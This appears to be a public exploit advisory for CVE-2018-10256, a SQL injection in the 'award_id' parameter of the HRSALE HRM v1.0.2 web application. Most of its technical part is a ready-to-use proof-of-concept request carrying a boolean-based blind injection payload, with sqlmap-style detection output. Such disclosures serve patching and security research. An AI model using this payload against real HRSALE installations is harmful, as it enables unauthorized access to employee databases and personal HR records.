33 lines
No EOL
1 KiB
Text
33 lines
No EOL
1 KiB
Text
# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection
|
|
# Date: 2018-04-23
|
|
# Exploit Author: 8bitsec
|
|
# CVE: CVE-2018-10256
|
|
# Vendor Homepage: https://codecanyon.net/
|
|
# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
|
|
# Version: 1.0.2
|
|
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
|
|
|
|
Release Date:
|
|
=============
|
|
2018-04-23
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
|
|
SQL injection on [award_id] parameter.
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
|
|
SQLi:
|
|
|
|
https://localhost/[path]/admin/user/read_awards/?jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS
|
|
|
|
Parameter: award_id (GET)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS |